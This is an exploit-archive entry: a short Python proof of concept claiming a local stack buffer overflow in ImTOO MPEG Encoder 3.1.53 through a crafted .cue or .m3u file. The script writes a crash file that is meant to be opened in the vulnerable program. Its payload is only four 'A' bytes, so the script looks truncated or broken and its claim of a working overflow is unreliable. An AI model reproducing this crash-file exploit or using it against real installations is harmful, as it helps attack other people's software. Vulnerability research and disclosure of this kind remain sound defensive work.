id: 6957
date: 08/05/2009
title: ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) Local Buffer Overflow PoC
author: opt!x hacker
cves: 

===============================================================
ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) Local Buffer Overflow PoC
===============================================================


#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "\x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()



#  0day.today [2023-03-26]  #